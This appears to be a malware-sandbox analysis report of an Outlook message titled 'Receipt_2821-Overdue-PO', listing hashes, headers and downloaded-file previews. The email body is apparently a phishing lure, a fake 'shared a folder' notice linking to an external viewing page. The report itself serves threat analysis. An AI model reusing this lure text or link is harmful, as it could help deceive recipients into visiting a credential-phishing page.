                                                                    Preview:RIFF....WEBPVP8X....(......7..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 v....O...*..8.>Q&.E..+.....p..en-)^n:......&F>^~.i.....6..y.x.........g....:...._.?.sr....wH........X.......E.{.o.....=..S........0....qw$..~......?.<..O.?..........y.....n=L=...._...~........W...?................o.....~.?......'............_..3.n.....3....O...;i....y........-.W......{....;}...W.....}....?.?..M.-...?..7.......#.?........_.....o_...~..[.?S.d.....3.....~......O..a...^........?..a.._..l......[.9-.A...(Mi.'Td.hp.U....z .wmD..K.:......P.V....L..@..2....3q..'6...2.K.!/*..'..v.~.e.{8.p#._..f.E3....ww..Y.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1683)
                                                                    Category:downloaded
                                                                    Size (bytes):1684
                                                                    Entropy (8bit):4.064440791139314
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:7288BEA0A172A941B73F81B2246F775B
                                                                    SHA1:741D2E91A49F1AEACE0252B129DC91E9F606B6D3
                                                                    SHA-256:C3A8C6A3FDFFAE81870FA723055EA66ADD5B2031314561430A366488B355C354
                                                                    SHA-512:85FCF572DE8CF7CCDECCC4C42459A48586F5E274242EE0D7232B3E16FC1DA2C1F8687D093953A5DDCE4962583193E12718F1D355AF452DB65CABD569C85EE124
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EFIPG37A.js
                                                                    Preview:var M=["AD","AL","AT","AX","BA","BE","BG","BY","CH","CZ","DE","DK","EE","ES","FI","FO","FR","GB","GG","GI","GR","HR","HU","IE","IM","IS","IT","JE","LI","LT","LU","LV","MC","MD","ME","MK","MT","NL","NO","PL","PT","RO","RS","RU","SE","SI","SJ","SK","SM","UA","VA"],n=["AT","BE","BG","HR","CY","CZ","DK","EE","FI","FR","DE","GR","HU","IS","IE","IT","LV","LI","LT","LU","MT","NL","NO","PL","PT","RO","SI","SK","ES","SE","CH","GB"],T=["AO","BF","BI","BJ","BW","CD","CF","CG","CI","CM","CV","DJ","DZ","EG","EH","ER","ET","GA","GH","GM","GN","GQ","GW","IO","KE","KM","LR","LS","LY","MA","MG","ML","MR","MU","MW","MZ","NA","NE","NG","RE","RW","SC","SD","SH","SL","SN","SO","SS","ST","SZ","TD","TF","TG","TN","TZ","UG","YT","ZA","ZM","ZW"],E=["AG","AI","AW","BB","BL","BM","BQ","BS","BZ","CA","CR","CU","CW","DM","DO","GD","GL","GP","GT","HN","HT","JM","KN","KY","LC","MF","MQ","MS","MX","NI","PA","PM","PR","SV","SX","TC","TT","US","VC","VG","VI"],A=["AR","BO","BR","BV","CL","CO","EC","FK","GF","GY","GS","P
                                                                    File type:CDFV2 Microsoft Outlook Message
                                                                    Entropy (8bit):5.5614877966151255
                                                                    TrID:
                                                                    • Outlook Message (71009/1) 58.92%
                                                                    • Outlook Form Template (41509/1) 34.44%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                    File name:Receipt_2821-Overdue-PO.msg
                                                                    File size:49'664 bytes
                                                                    MD5:1479e50964d4a6a1335b8e6cdee72da7
                                                                    SHA1:93fb8343ce9047cc1e6122ba048fec53bc6f0ba7
                                                                    SHA256:fa389904b95b12409e25be2639f00f5bdc72099c512ef487bf845cd05137d38b
                                                                    SHA512:1196224af0f67927bb015e1cbb1cc5ceb2a95e6978fbfa9f48590523a9496aa9450b6b6bd0c253e7caec8ea8ba685a7068ab2c3c8c385b37ebe82c68fcec741b
                                                                    SSDEEP:768:71gKgpODG1Adklja2umQPsKZsKXxKNXwMtHMqykcLMMqbmYWrYpoBXv0bVaPYSNx:GquIxxPINXw/YawYvaxSYv
                                                                    TLSH:8B23C62536AA8615F27E9F761EE5C1C7C622BCC1FD21C68F3291734E09B1581A970B2F
                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                    Subject:Receipt_2821-Overdue-PO
                                                                    From:Robson Turnbull <Robson.Turnbull@paragon-rt.com>
                                                                    To:
                                                                    Cc:
                                                                    BCC:
                                                                    Date:Thu, 28 Mar 2024 13:35:09 +0100
                                                                    Communications:
                                                                    • Robson Turnbull Shared a folder with you Robson Turnbull Shared Document" with you. Open <https://my.visme.co/view/319jm3x1-paragon-rapid-technology-ltd#s1> Privacy <https://northeuroper-notifyp.svc.ms/api/v2/tracking/method/Click?mi=0WaQG4ssnU6UvoYUPz4Qkg&tc=PrivacyStatement&cs1=e904d62807d7d8a08355e9a7a50afb8d836b2e5907b97e0fba743b3318254399&cs2=5bdf4fe521e4d0302e10dee4b668265dd585c394cc2a679eabf178a2bc8735d0&ru=https%3a%2f%2fprivacy.microsoft.com%2fprivacystatement%5c> Statement Best regards, Robson Turnbull Projects Team Manager Main Reception: 01325 333141 | Ext.: 117 Paragon Rapid Technologies Ltd Aviation Way | Teesside International Airport Darlington | Co. Durham | DL2 1NA www.paragon-rt.com <http://www.paragon-rt.com/> www.paragon-rt.com/rapid-response <http://www.paragon-rt.com/rapid-response> Paragon Rapid Technologies Ltd is registered in England and Wales with Company Number 4858233 VAT Reg No. 817530240. The information contained in this e-mail is confidential and may be legally privileged. It is intended solely for the use of the addressee and others authorised to receive it. If you are not the intended recipient, please note that any circulation or copying of this e-mail is strictly prohibited. If you have received this e-mail in error, please delete it immediately. Paragon Rapid Technologies Ltd makes every effort to ensure that this e-mail and any attachments are sent virus free. However, it is the responsibility of the recipient to perform any checks they deem necessary.
                                                                    Attachments:
                                                                    • Outlook-0l11ljhm
                                                                    • Outlook-CEO Today
                                                                    Key Value
                                                                    FromRobson Turnbull <Robson.Turnbull@paragon-rt.com>
                                                                    SubjectReceipt_2821-Overdue-PO
                                                                    Thread-TopicReceipt_2821-Overdue-PO
                                                                    Thread-IndexAQHagQxLXtJcmQXUaECju/8YeDq/5w==
                                                                    DateThu, 28 Mar 2024 12:35:09 +0000
                                                                    Message-ID<CWLP123MB732421D7550E3D5FEBBB2D37D33B2@CWLP123MB7324.GBRP123.PROD.OUTLOOK.COM>
                                                                    Content-Languageen-GB
                                                                    X-MS-Has-Attachyes
                                                                    X-MS-Exchange-Organization-SCL-1
                                                                    X-MS-TNEF-Correlatormsip_labels:
                                                                    Content-Typemultipart/related;
                                                                    MIME-Version1.0
                                                                    dateThu, 28 Mar 2024 13:35:09 +0100

                                                                    Icon Hash:c4e1928eacb280a2